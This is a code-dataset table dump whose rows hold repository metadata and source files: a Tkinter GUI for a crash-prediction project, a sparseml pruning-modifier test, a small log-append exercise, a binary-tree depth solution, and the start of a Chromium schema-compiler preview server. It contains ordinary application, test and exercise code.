hexsha stringlengths 40 40 | size int64 3 1.03M | ext stringclasses 10
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 3 972 | max_stars_repo_name stringlengths 6 130 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 972 | max_issues_repo_name stringlengths 6 130 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 116k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 972 | max_forks_repo_name stringlengths 6 130 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 3 1.03M | avg_line_length float64 1.13 941k | max_line_length int64 2 941k | alphanum_fraction float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
0069da6201085be93267ce6305ea86fc96eb9fed | 20,127 | py | Python | src/GUI/Final_GUI.py | suchetsapre/vehicle-crash-prediction | c6fa4ee37f026b42f4ccadb7337205f0b61008c0 | [
"MIT"
] | null | null | null | src/GUI/Final_GUI.py | suchetsapre/vehicle-crash-prediction | c6fa4ee37f026b42f4ccadb7337205f0b61008c0 | [
"MIT"
] | null | null | null | src/GUI/Final_GUI.py | suchetsapre/vehicle-crash-prediction | c6fa4ee37f026b42f4ccadb7337205f0b61008c0 | [
"MIT"
] | null | null | null | """ Running this file will allow for experimentation with my GUI """
from __future__ import print_function
import datetime
import math
import os
from tkinter import *
import PIL.Image
import PIL.ImageTk
import cv2
import keras
import matplotlib.pyplot as plt
import numpy as np
import pytube
from src.ML_Application import Filtered_Input_Data_Creation
from src.Naive_Crash_Predictor import NCP_Algorithm
# This path will vary based on where the dataset is stored on your local machine.
path_to_dashcam_video_dataset = "../../../Crash_Detection_Project/"
# Output folders (relative to this script's working directory) for videos
# downloaded from YouTube and for videos produced by the predictor.
path_to_youtube_vids = './Sample_Generated_YouTube_Videos/'
path_to_generated_prediction_vids = './Sample_Generated_Prediction_Videos/'
class CreateToolTip(object):
    """
    Author: crxguy52
    Date: March 25, 2016
    Create a tooltip for a given widget.

    Shows a borderless Toplevel containing ``text`` after the mouse has
    hovered over ``widget`` for ``waittime`` milliseconds; the tip is hidden
    again when the mouse leaves the widget or a button is pressed.
    """

    def __init__(self, widget, text='widget info'):
        self.waittime = 500  # delay before the tip appears, in milliseconds
        self.wraplength = 180  # wrap width of the tip text, in pixels
        self.widget = widget
        self.text = text
        self.widget.bind("<Enter>", self.enter)
        self.widget.bind("<Leave>", self.leave)
        self.widget.bind("<ButtonPress>", self.leave)
        self.id = None  # id of the pending `after` callback, if any
        self.tw = None  # the tooltip Toplevel window, when visible

    def enter(self, event=None):
        """Mouse entered the widget: start the delayed-show timer."""
        self.schedule()

    def leave(self, event=None):
        """Mouse left the widget (or pressed a button): cancel and hide."""
        self.unschedule()
        self.hidetip()

    def schedule(self):
        """(Re)arm the delayed callback that will show the tooltip."""
        self.unschedule()
        self.id = self.widget.after(self.waittime, self.showtip)

    def unschedule(self):
        """Cancel any pending delayed show."""
        # Fix: use a descriptive local instead of shadowing the builtin `id`.
        scheduled_id = self.id
        self.id = None
        if scheduled_id:
            self.widget.after_cancel(scheduled_id)

    def showtip(self, event=None):
        """Create the tooltip window just below/right of the widget."""
        # Fix: removed the dead `x = y = 0` pre-assignment — the values were
        # always overwritten by the bbox unpack on the next line.
        x, y, _cx, _cy = self.widget.bbox("insert")
        x += self.widget.winfo_rootx() + 25
        y += self.widget.winfo_rooty() + 20
        # Borderless toplevel so only the label itself is visible.
        self.tw = Toplevel(self.widget)
        self.tw.wm_overrideredirect(True)
        self.tw.wm_geometry("+%d+%d" % (x, y))
        label = Label(self.tw, text=self.text, justify='left',
                      background="#ffffff", relief='solid', borderwidth=1,
                      wraplength=self.wraplength)
        label.pack(ipadx=1)

    def hidetip(self):
        """Destroy the tooltip window if one is currently shown."""
        tip_window = self.tw
        self.tw = None
        if tip_window:
            tip_window.destroy()
class FrameExtractor():
    '''
    Author: erykml
    Link: https://gist.github.com/erykml/6a1fe38763664567e6052e78e047ebb5
    Class used for extracting frames from a video file.
    '''

    def __init__(self, video_path):
        self.video_path = video_path
        self.vid_cap = cv2.VideoCapture(video_path)
        self.n_frames = int(self.vid_cap.get(cv2.CAP_PROP_FRAME_COUNT))
        self.fps = int(self.vid_cap.get(cv2.CAP_PROP_FPS))

    def get_video_duration(self):
        ''' Prints the duration of the given video '''
        duration = self.n_frames / self.fps
        print(f'Duration: {datetime.timedelta(seconds=duration)}')

    def get_n_images(self, every_x_frame):
        ''' Prints how many images sampling every `every_x_frame`-th frame yields. '''
        n_images = math.floor(self.n_frames / every_x_frame) + 1
        print(f'Extracting every {every_x_frame} (nd/rd/th) frame would result in {n_images} images.')

    def _reopen_capture_if_needed(self):
        ''' Re-open the capture if a previous extraction released it. '''
        if not self.vid_cap.isOpened():
            self.vid_cap = cv2.VideoCapture(self.video_path)

    @staticmethod
    def _resolve_dest_path(dest_path):
        ''' Default to the CWD; create the destination directory if missing. '''
        if dest_path is None:
            return os.getcwd()
        if not os.path.isdir(dest_path):
            os.mkdir(dest_path)
            print(f'Created the following directory: {dest_path}')
        return dest_path

    def _release(self):
        ''' Release the capture and tear down any OpenCV windows. '''
        self.vid_cap.release()
        cv2.destroyAllWindows()

    def extract_frames(self, every_x_frame, img_name, dest_path=None, img_ext='.jpg'):
        ''' Save every `every_x_frame`-th frame of the video to dest_path as
        <img_name>_<n><img_ext>, then release the capture. '''
        self._reopen_capture_if_needed()
        dest_path = self._resolve_dest_path(dest_path)
        frame_cnt = 0
        img_cnt = 0
        while self.vid_cap.isOpened():
            success, image = self.vid_cap.read()
            if not success:
                break
            if frame_cnt % every_x_frame == 0:
                img_path = os.path.join(dest_path, ''.join([img_name, '_', str(img_cnt), img_ext]))
                cv2.imwrite(img_path, image)
                img_cnt += 1
            frame_cnt += 1
        self._release()

    def extract_first_frame(self, img_name, dest_path=None, img_ext='.jpg'):
        ''' Save only the first frame of the video as <img_name>_0<img_ext>.
        Returns 0 if the video could not be read (unchanged contract). '''
        self._reopen_capture_if_needed()
        dest_path = self._resolve_dest_path(dest_path)
        success, image = self.vid_cap.read()
        if not success:
            # BUG FIX: the original returned here without releasing the
            # capture, leaking the video file handle on unreadable videos.
            self._release()
            return 0
        img_path = os.path.join(dest_path, ''.join([img_name, '_', str(0), img_ext]))
        cv2.imwrite(img_path, image)
        self._release()
def main():
    """Build and run the Tk GUI for the vehicle crash prediction demos.

    The window exposes three workflows:
      * playing pre-generated demo prediction videos (clicked_sim),
      * running the Naive Crash Predictor with user-tuned parameters on a
        dataset video or a downloaded YouTube video (clicked_sim2),
      * running the trained ML model on a test video and plotting the
        per-frame crash probability (run_ml_model_filtered / _images).

    State shared between the Tk callbacks (scale values, the selected
    YouTube file, and which source takes priority) lives in module-level
    globals because the callbacks are closures created inside this function.
    """
    global frameRate
    global depthDifferential
    global distanceDifferential
    global lookAhead
    global youtubeFile
    global priority
    youtubeFile = None
    priority = 0  # 0 : drop down; 1 : youtube
    img_size = (300, 175)  # thumbnail size (width, height) in pixels
    def show_video(cap, wait_time):
        """Play an opened cv2.VideoCapture in an OpenCV window; 'q' quits."""
        if not cap.isOpened():
            print("Error opening video file")
        while cap.isOpened():
            ret, frame = cap.read()
            if ret:
                cv2.imshow('Frame', frame)
                if cv2.waitKey(wait_time) & 0xFF == ord('q'):
                    break
            else:
                break
        cap.release()
        cv2.destroyAllWindows()
    def clicked_sim():
        '''
        Play the pre-generated baseline prediction video that matches the
        dropdown selection.
        Video 1: output36.avi
        Video 2: output31.avi
        Video 3: output37.avi
        '''
        header_label1.config(text="Processing")
        video_num = variable.get()
        video_name = ""
        if video_num == "Video 1":
            video_name = "OutputVideos/Demo_Video1.avi"
        elif video_num == "Video 2":
            video_name = "OutputVideos/Demo_Video2.avi"
        elif video_num == "Video 3":
            video_name = "OutputVideos/Demo_Video3.avi"
        cap = cv2.VideoCapture(video_name)
        global frameRate
        # Baseline playback is fixed at 30 fps regardless of the scale.
        wait_time = max(int(1000 / 30), 1)
        show_video(cap, wait_time)
        header_label1.config(text="Video Display")
        print("DONE")
    def clicked_sim2():
        """Run the NCP predictor with the user's scale parameters and play
        the generated output video. A downloaded YouTube video (priority 1)
        takes precedence over the dropdown selection."""
        header_label1.config(text="Processing")
        start_frame = 0
        end_frame = 100
        video_name = ""
        video_num = variable.get()
        global priority
        global youtubeFile
        if youtubeFile is not None and priority == 1:
            # start_frame == -1 signals "process the whole YouTube video".
            start_frame = -1
            video_name = path_to_youtube_vids + youtubeFile
        elif video_num == "Video 1":  # video 74
            video_name = path_to_dashcam_video_dataset + 'videos/training/positive/000074.mp4'
            start_frame = 55
            end_frame = 100
        elif video_num == "Video 2":  # video 30
            video_name = path_to_dashcam_video_dataset + 'videos/training/positive/000030.mp4'
            start_frame = 27
            end_frame = 40
        elif video_num == "Video 3":  # video 78
            video_name = path_to_dashcam_video_dataset + 'videos/training/positive/000078.mp4'
            start_frame = 39
            end_frame = 100
        global frameRate
        global depthDifferential
        global distanceDifferential
        global lookAhead
        # Encode the chosen parameters into the output filename so distinct
        # runs do not overwrite each other.
        if priority == 0:
            vid_tag = video_num + '_Depth_' + str(depthDifferential) + '_Distance_' + str(
                distanceDifferential) + '_LookAhead_' + str(lookAhead)
        else:
            vid_tag = youtubeFile[:-4] + '_Depth_' + str(depthDifferential) + '_Distance_' + str(
                distanceDifferential) + '_LookAhead_' + str(lookAhead)
        output_file = path_to_generated_prediction_vids + vid_tag + '.avi'
        NCP_Algorithm.process_predict_output(start_frame, end_frame, video_name, frameRate, depthDifferential,
                                             distanceDifferential, lookAhead, output_file)
        cap = cv2.VideoCapture(output_file)
        wait_time = max(int(1000 / frameRate), 1)
        show_video(cap, wait_time)
        print('DONE')
    def clicked_logo():
        """Play the previously downloaded YouTube video named in the entry box."""
        video_url = youtube_entry.get()
        vid = pytube.YouTube(video_url)
        compressed_video_title = vid.title
        cap = cv2.VideoCapture(path_to_youtube_vids + compressed_video_title + ".mp4")
        global frameRate
        wait_time = max(int(1000 / frameRate), 1)
        show_video(cap, wait_time)
    def clicked_yt():
        """
        Download the mp4 stream of the YouTube URL in the entry box, extract
        its first frame as a thumbnail, and make it the active video source.
        Potential YouTube Crash Videos
        1. https://www.youtube.com/watch?v=S3QgwUyajys
        2. https://www.youtube.com/watch?v=M3EtizAg9Z4
        3. https://www.youtube.com/watch?v=ybpXPfvZG1Y
        4. https://www.youtube.com/watch?v=jS7TPAO0c7g
        5. https://www.youtube.com/watch?v=5DEdR5lqnDE
        6. https://www.youtube.com/watch?v=5G4-LjIdRL0
        7. https://www.youtube.com/watch?v=ybpXPfvZG1Y
        """
        youtube_label.config(text="Downloading...")
        video_url = youtube_entry.get()
        vid_stream = pytube.YouTube(video_url).streams
        mp4_stream = vid_stream.filter(file_extension="mp4")
        mp4_stream.first().download('./Sample_Generated_YouTube_Videos/')
        youtube_label.config(text="Download Complete! Enter Another YT Link Here")
        vid = pytube.YouTube(video_url)
        compressed_video_title = vid.title
        fe = FrameExtractor(path_to_youtube_vids + compressed_video_title + '.mp4')
        fe.extract_first_frame(compressed_video_title, path_to_youtube_vids)
        im = PIL.Image.open(path_to_youtube_vids + compressed_video_title + '_0' + '.jpg')
        im = im.resize(img_size)
        ph = PIL.ImageTk.PhotoImage(im)
        image_label = Label(window, image=ph)
        # Keep a reference on the widget so Tk's GC does not drop the image.
        image_label.image = ph
        image_label.grid(column=1, row=10)
        global youtubeFile
        global priority
        youtubeFile = compressed_video_title + '.mp4'
        priority = 1
    def get_depth_differential(*args):
        """ Obtains the value from the depth differential scale. """
        global depthDifferential
        depthDifferential = scale1.get()
    def get_distance_differential(*args):
        """ Obtains the value from the distance differential scale. """
        global distanceDifferential
        distanceDifferential = scale2.get()
    def get_frame_rate(*args):
        """ Obtains the value from the frame rate scale. """
        global frameRate
        frameRate = scale3.get()
    def get_look_ahead(*args):
        """ Obtains the value from the look ahead scale. """
        global lookAhead
        lookAhead = scale4.get()
    ''' ML CODE BELOW '''
    def read_images_from_video(filename):
        """ Returns the frames given a video filename. """
        vid_cap = cv2.VideoCapture(filename)
        success, image = vid_cap.read()
        count = 0
        frames = []
        while success:
            frames.append(np.array(PIL.Image.fromarray(image)))
            success, image = vid_cap.read()
            count += 1
        return frames
    def run_ml_model_filtered():
        """Run the filtered-input Keras model on the selected test video and
        display the per-frame crash-probability plot in the GUI."""
        model = keras.models.load_model(
            '../ML_Models/filtered_input_model_lossoptimization.h5')  # FirstCondensedModelTest.h5 corresponds with 1pct
        vid_num = int(ml_video_number.get())
        vid_num_reformatted = '{:06}'.format(vid_num)
        vid_filepath = 'TEMP'
        # Dataset layout: positive (crash) test videos are 456-620,
        # negative (no crash) test videos are 830-1130.
        if 620 >= vid_num >= 456:
            vid_filepath = path_to_dashcam_video_dataset + 'videos/testing/positive/' + vid_num_reformatted + '.mp4'
        if 1130 >= vid_num >= 830:
            vid_filepath = path_to_dashcam_video_dataset + 'videos/testing/negative/' + vid_num_reformatted + '.mp4'
        x_data = [Filtered_Input_Data_Creation.convert_video_to_data(vid_filepath)]
        x_data_padded = []
        pad_len = 69  # 37 for 1pct datafile, 65 for 10pct datafile, 69 for 100pct datafile
        for vid_data in x_data:
            # Zero-pad the feature axis so every video matches the model's
            # fixed input width.
            pad_vid = np.pad(vid_data, ((0, 0), (0, pad_len - vid_data.shape[1])), 'constant')
            x_data_padded.append(pad_vid)
        x_test = np.array(x_data_padded)
        pred = model.predict(x_test)
        plt.plot(pred[0])
        plt.xlabel('Frame Number')
        plt.ylabel('Probability of Crash Within Next 20 Frames')
        plt.savefig('GUI_ScreenShots/ML_Plot_Filtered_Video_' + str(vid_num) + '.png')
        plt.clf()
        ml_im = PIL.Image.open('GUI_ScreenShots/ML_Plot_Filtered_Video_' + str(vid_num) + '.png')
        ml_im = ml_im.resize((int(img_size[0] * 1.3), int(img_size[1] * 1.5)))
        ml_ph = PIL.ImageTk.PhotoImage(ml_im)
        ml_image_label = Label(window, image=ml_ph)
        ml_image_label.image = ml_ph
        ml_image_label.grid(column=6, row=10)
    def run_ml_model_images():
        ''' Given a .h5 file and a video number from the text box, output the probability vs. frame graph of the ML crash prediction model. '''
        model = keras.models.load_model('my_model2.h5')
        vid_num = int(ml_video_number.get())
        vid_num_reformatted = '{:06}'.format(vid_num)
        vid_filepath = 'TEMP'
        if 620 >= vid_num >= 456:
            vid_filepath = path_to_dashcam_video_dataset + 'videos/testing/positive/' + vid_num_reformatted + '.mp4'
        if 1130 >= vid_num >= 830:
            vid_filepath = path_to_dashcam_video_dataset + 'videos/testing/negative/' + vid_num_reformatted + '.mp4'
        x_test = read_images_from_video(vid_filepath)
        for i in range(len(x_test)):
            # Downscale and convert to grayscale to match the model's input.
            x_test[i] = cv2.resize(x_test[i], (178, 100), interpolation=cv2.INTER_AREA)
            x_test[i] = cv2.cvtColor(x_test[i], cv2.COLOR_RGB2GRAY)
        x_test = np.reshape(x_test, (100, 100, 178, 1))
        pred = model.predict(x_test)
        plt.plot(pred)
        plt.xlabel('Frame Number')
        plt.ylabel('Probability of Crash Within Next 20 Frames')
        plt.savefig('GUI_ScreenShots/ML_Plot_Images_Video_' + str(vid_num) + '.png')
        plt.clf()
        ml_im = PIL.Image.open('GUI_ScreenShots/ML_Plot_Images_Video_' + str(vid_num) + '.png')
        ml_im = ml_im.resize((int(img_size[0] * 1.3), int(img_size[1] * 1.5)))
        ml_ph = PIL.ImageTk.PhotoImage(ml_im)
        ml_image_label = Label(window, image=ml_ph)
        ml_image_label.image = ml_ph
        ml_image_label.grid(column=6, row=10)
    # ---- Window construction: YouTube controls, demo buttons, dropdown ----
    window = Tk()
    window.title("Car Crash Prediction UI")
    window.geometry("1400x780")
    title_label = Label(window, text="Linear Approximation Approach", font='Helvetica 24 bold')
    title_label.grid(column=1, row=3)
    youtube_label = Label(window, text="Enter Youtube Link Here", font='Helvetica 16')
    youtube_label.grid(column=2, row=1)
    youtube_entry = Entry(window)
    youtube_entry.grid(column=2, row=2)
    youtube_button = Button(window, text="Get Video", bg="orange", fg="red", command=clicked_yt)
    youtube_button.grid(column=3, row=2)
    youtube_button_ttp = CreateToolTip(youtube_button, "Click this button to fetch the YouTube video from the internet")
    im_1 = PIL.Image.open('GUI_ScreenShots/YTLogo.png')
    im_1 = im_1.resize((75, 50))
    ph_1 = PIL.ImageTk.PhotoImage(im_1)
    logo_button = Button(window, image=ph_1, bg="orange", fg="red", command=clicked_logo)
    logo_button.grid(column=3, row=1)
    logo_button_ttp = CreateToolTip(logo_button, "Click this button to play the YouTube video on screen")
    run_button = Button(window, text="Run Baseline Crash Prediction", bg="orange", fg="red", command=clicked_sim)
    run_button.grid(column=0, row=11)
    run_button2 = Button(window, text="Run User-Parameter Crash Prediction", bg="orange", fg="red",
                         command=clicked_sim2)
    run_button2.grid(column=2, row=11)
    run_button_ttp = CreateToolTip(run_button, "Click this button in order to run the crash prediction algorithm")
    run_button2_ttp = CreateToolTip(run_button2,
                                    "Click this button in order to run the crash prediction algorithm using USER selected parameters")
    OPTIONS = [
        "Video 1",
        "Video 2",
        "Video 3"
    ]  # etc
    variable = StringVar(window)
    variable.set(OPTIONS[0])  # default value
    drop_down_label = Label(window, text="Select Video")
    drop_down_label.grid(column=0, row=0)
    dropdown = OptionMenu(window, variable, *OPTIONS)
    dropdown.grid(column=0, row=0)
    dropdown_ttp = CreateToolTip(dropdown, "Use this dropdown to change the test video")
    header_label1 = Label(window, text="Video Display", font='Helvetica 18')
    header_label1.grid(column=1, row=9)
    im = PIL.Image.open('GUI_ScreenShots/Thumbnail_Video1.jpg')
    im = im.resize(img_size)
    ph = PIL.ImageTk.PhotoImage(im)
    image_label = Label(window, image=ph)
    image_label.grid(column=1, row=10)
    def callback(*args):
        """Dropdown-change handler: revert to dropdown priority and swap in
        the matching thumbnail image."""
        global priority
        priority = 0
        print(variable.get())
        if variable.get() == "Video 1":
            im = PIL.Image.open('GUI_ScreenShots/Thumbnail_Video1.jpg')
            im = im.resize(img_size)
            ph = PIL.ImageTk.PhotoImage(im)
            image_label = Label(window, image=ph)
            image_label.image = ph
            image_label.grid(column=1, row=10)
        elif variable.get() == "Video 2":
            im = PIL.Image.open('GUI_ScreenShots/Thumbnail_Video2.jpg')
            im = im.resize(img_size)
            ph = PIL.ImageTk.PhotoImage(im)
            image_label = Label(window, image=ph)
            image_label.image = ph
            image_label.grid(column=1, row=10)
        elif variable.get() == "Video 3":
            im = PIL.Image.open('GUI_ScreenShots/Thumbnail_Video3.jpg')
            im = im.resize(img_size)
            ph = PIL.ImageTk.PhotoImage(im)
            image_label = Label(window, image=ph)
            image_label.image = ph
            image_label.grid(column=1, row=10)
    variable.trace('w', callback)
    # ---- Parameter scales for the NCP algorithm and playback ----
    header_label2 = Label(window, text="Parameters", font='Helvetica 18')
    header_label2.grid(column=1, row=4)
    header_label2_ttp = CreateToolTip(header_label2,
                                      "Use these scale parameters to adjust the algorithm and video playback")
    scale_label1 = Label(window, text="Depth Differential")
    scale_label1.grid(column=0, row=5)
    scale1 = Scale(window, from_=1, to=100, command=get_depth_differential)
    scale1.grid(column=0, row=6)
    scale_label2 = Label(window, text="Distance Differential")
    scale_label2.grid(column=1, row=5)
    scale2 = Scale(window, from_=1, to=100, command=get_distance_differential)
    scale2.grid(column=1, row=6)
    scale_label3 = Label(window, text="Frame Rate")
    scale_label3.grid(column=2, row=5)
    scale3 = Scale(window, from_=1, to=250, command=get_frame_rate)
    scale3.grid(column=2, row=6)
    scale_label4 = Label(window, text="Look Ahead")
    scale_label4.grid(column=3, row=5)
    scale4 = Scale(window, from_=1, to=20, command=get_look_ahead)
    scale4.grid(column=3, row=6)
    # ---- ML application panel ----
    ml_label = Label(window, text="Machine Learning Application", font='Helvetica 24 bold')
    ml_label.grid(column=6, row=3)
    ml_label2 = Label(window, text="Enter Video Number Here. \n Positive (456-620); Negative (830-1130).",
                      font='Helvetica 18')
    ml_label2.grid(column=6, row=5)
    ml_label2_ttp = CreateToolTip(ml_label2, "Select the testing video here")
    ml_video_number = Entry(window)
    ml_video_number.grid(column=6, row=6)
    ml_run_button = Button(window, text="Run ML Algorithm", bg="orange", fg="red", command=run_ml_model_filtered)
    ml_run_button.grid(column=6, row=7)
    ml_run_button_ttp = CreateToolTip(ml_run_button, "Use this button to run the ML algorithm on the selected video")
    ml_graph_label = Label(window, text="Output Display", font='Helvetica 18')
    ml_graph_label.grid(column=6, row=8)
    ml_im = PIL.Image.open('GUI_ScreenShots/Thumbnail_ML_Graph.png')
    ml_im = ml_im.resize(img_size)
    ml_ph = PIL.ImageTk.PhotoImage(ml_im)
    ml_image_label = Label(window, image=ml_ph)
    ml_image_label.grid(column=6, row=10)
    window.mainloop()
# Launch the GUI only when this file is run as a script, not on import.
if __name__ == "__main__":
    main()
| 35.749556 | 143 | 0.63303 |
86575be3471988faff2bb12d17535b26f8d23550 | 4,497 | py | Python | tests/sparseml/pytorch/sparsification/pruning/test_modifier_pruning_constant.py | anmarques/sparseml | c8352f1d896bfb1258add4e563d8163d3702b5ef | [
"Apache-2.0"
] | null | null | null | tests/sparseml/pytorch/sparsification/pruning/test_modifier_pruning_constant.py | anmarques/sparseml | c8352f1d896bfb1258add4e563d8163d3702b5ef | [
"Apache-2.0"
] | null | null | null | tests/sparseml/pytorch/sparsification/pruning/test_modifier_pruning_constant.py | anmarques/sparseml | c8352f1d896bfb1258add4e563d8163d3702b5ef | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2021 - present / Neuralmagic, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import pytest
from sparseml.pytorch.sparsification.pruning import ConstantPruningModifier
from tests.sparseml.pytorch.helpers import LinearNet
from tests.sparseml.pytorch.optim.test_modifier import (
ScheduledModifierTest,
create_optim_adam,
create_optim_sgd,
)
from tests.sparseml.pytorch.sparsification.pruning.helpers import (
state_dict_save_load_test,
)
from tests.sparseml.pytorch.helpers import ( # noqa isort:skip
test_epoch,
test_loss,
test_steps_per_epoch,
)
@pytest.mark.skipif(
    os.getenv("NM_ML_SKIP_PYTORCH_TESTS", False),
    reason="Skipping pytorch tests",
)
@pytest.mark.parametrize(
    "modifier_lambda",
    [
        lambda: ConstantPruningModifier(
            params=["re:.*weight"],
        ),
        lambda: ConstantPruningModifier(
            params=["seq.fc1.weight"],
            start_epoch=10.0,
            end_epoch=25.0,
        ),
    ],
    scope="function",
)
@pytest.mark.parametrize("model_lambda", [LinearNet], scope="function")
@pytest.mark.parametrize(
    "optim_lambda",
    [create_optim_sgd, create_optim_adam],
    scope="function",
)
class TestConstantPruningModifier(ScheduledModifierTest):
    """Parametrized lifecycle tests for ConstantPruningModifier.

    Each test runs for every combination of modifier config, model, and
    optimizer declared in the parametrize decorators above; the
    modifier/model/optim fixtures are supplied as zero-arg factories so a
    fresh instance is built per test.
    """

    def test_lifecycle(
        self,
        modifier_lambda,
        model_lambda,
        optim_lambda,
        test_steps_per_epoch,  # noqa: F811
    ):
        """Check update_ready is False before start_epoch, True at
        start/end epochs, and False again after end_epoch."""
        modifier = modifier_lambda()
        model = model_lambda()
        optimizer = optim_lambda(model)
        self.initialize_helper(modifier, model)
        # check sparsity is not set before
        if modifier.start_epoch >= 0:
            for epoch in range(int(modifier.start_epoch)):
                assert not modifier.update_ready(epoch, test_steps_per_epoch)
        epoch = int(modifier.start_epoch) if modifier.start_epoch >= 0 else 0.0
        assert modifier.update_ready(epoch, test_steps_per_epoch)
        modifier.scheduled_update(model, optimizer, epoch, test_steps_per_epoch)
        if modifier.end_epoch >= 0:
            epoch = int(modifier.end_epoch)
            assert modifier.update_ready(epoch, test_steps_per_epoch)
            modifier.scheduled_update(model, optimizer, epoch, test_steps_per_epoch)
            # Past end_epoch the modifier must no longer request updates.
            for epoch in range(
                int(modifier.end_epoch) + 1, int(modifier.end_epoch) + 6
            ):
                assert not modifier.update_ready(epoch, test_steps_per_epoch)

    def test_state_dict_save_load(
        self,
        modifier_lambda,
        model_lambda,
        optim_lambda,
        test_steps_per_epoch,  # noqa: F811
    ):
        """Delegate to the shared save/load round-trip helper (strict=False)."""
        state_dict_save_load_test(
            self,
            modifier_lambda,
            model_lambda,
            optim_lambda,
            test_steps_per_epoch,
            False,
        )
@pytest.mark.skipif(
    os.getenv("NM_ML_SKIP_PYTORCH_TESTS", False),
    reason="Skipping pytorch tests",
)
def test_constant_pruning_yaml():
    """Round-trip a ConstantPruningModifier through YAML parsing and
    re-serialization and verify every configured field survives both trips
    and matches a directly constructed instance."""
    start_epoch = 5.0
    end_epoch = 15.0
    params = ["re:.*weight"]
    yaml_str = f"""
    !ConstantPruningModifier
    start_epoch: {start_epoch}
    end_epoch: {end_epoch}
    params: {params}
    """
    # Three construction paths that must all agree.
    yaml_modifier = ConstantPruningModifier.load_obj(
        yaml_str
    )  # type: ConstantPruningModifier
    serialized_modifier = ConstantPruningModifier.load_obj(
        str(yaml_modifier)
    )  # type: ConstantPruningModifier
    obj_modifier = ConstantPruningModifier(
        start_epoch=start_epoch, end_epoch=end_epoch, params=params
    )
    assert isinstance(yaml_modifier, ConstantPruningModifier)
    for attr in ("start_epoch", "end_epoch", "params"):
        expected = getattr(obj_modifier, attr)
        assert getattr(yaml_modifier, attr) == expected
        assert getattr(serialized_modifier, attr) == expected
| 30.591837 | 84 | 0.675339 |
79c8b5f1703df05e862d8ef8c4a60ed59537eca6 | 356 | py | Python | week5/week5_practical4b_3.py | harshonyou/SOFT1 | 1bd2b0cc26d39c549bec576389bebd0fd011387d | [
"Apache-2.0"
] | null | null | null | week5/week5_practical4b_3.py | harshonyou/SOFT1 | 1bd2b0cc26d39c549bec576389bebd0fd011387d | [
"Apache-2.0"
] | null | null | null | week5/week5_practical4b_3.py | harshonyou/SOFT1 | 1bd2b0cc26d39c549bec576389bebd0fd011387d | [
"Apache-2.0"
] | null | null | null | '''
Exercise 3:
Write a function save_to_log(entry, logfile) that takes two parameters, a string
entry to be written at the end of the text file named logfile (also a string). The previous
content of the logfile MUST NOT be erased
'''
def save_to_log(entry, logfile):
    """Append ``entry`` as a new line at the end of the text file ``logfile``.

    The file is opened in append mode, so any previous content is preserved;
    the file is created if it does not yet exist.
    """
    with open(logfile, 'a') as log_handle:
        log_handle.write(str(entry) + '\n')
save_to_log('more','ayy') | 32.363636 | 91 | 0.724719 |
87bbb9d0ae9573ba6ce6cc44ff55519120b8c402 | 405 | py | Python | maxDepth.py | gardenia22/leetcode | 1e24425eea5d0aa31742719de80380b3f116ee51 | [
"CC0-1.0"
] | null | null | null | maxDepth.py | gardenia22/leetcode | 1e24425eea5d0aa31742719de80380b3f116ee51 | [
"CC0-1.0"
] | null | null | null | maxDepth.py | gardenia22/leetcode | 1e24425eea5d0aa31742719de80380b3f116ee51 | [
"CC0-1.0"
] | null | null | null | ° # Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
    # @param {TreeNode} root
    # @return {integer}
    def maxDepth(self, root):
        """Return the number of nodes on the longest root-to-leaf path
        (0 for an empty tree)."""
        if root is None:
            return 0
        left_depth = self.maxDepth(root.left)
        right_depth = self.maxDepth(root.right)
        return max(left_depth, right_depth) + 1
| 22.5 | 77 | 0.558025 |
db4550ea6aef8cb51058af6923cf43d2f7355da6 | 12,559 | py | Python | tools/json_schema_compiler/preview.py | google-ar/chromium | 2441c86a5fd975f09a6c30cddb57dfb7fc239699 | [
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 2,151 | 2020-04-18T07:31:17.000Z | 2022-03-31T08:39:18.000Z | tools/json_schema_compiler/preview.py | harrymarkovskiy/WebARonARCore | 2441c86a5fd975f09a6c30cddb57dfb7fc239699 | [
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 395 | 2020-04-18T08:22:18.000Z | 2021-12-08T13:04:49.000Z | tools/json_schema_compiler/preview.py | harrymarkovskiy/WebARonARCore | 2441c86a5fd975f09a6c30cddb57dfb7fc239699 | [
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 338 | 2020-04-18T08:03:10.000Z | 2022-03-29T12:33:22.000Z | #!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Server for viewing the compiled C++ code from tools/json_schema_compiler.
"""
import cc_generator
import code
import cpp_type_generator
import cpp_util
import h_generator
import idl_schema
import json_schema
import model
import optparse
import os
import shlex
import urlparse
from highlighters import (
pygments_highlighter, none_highlighter, hilite_me_highlighter)
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
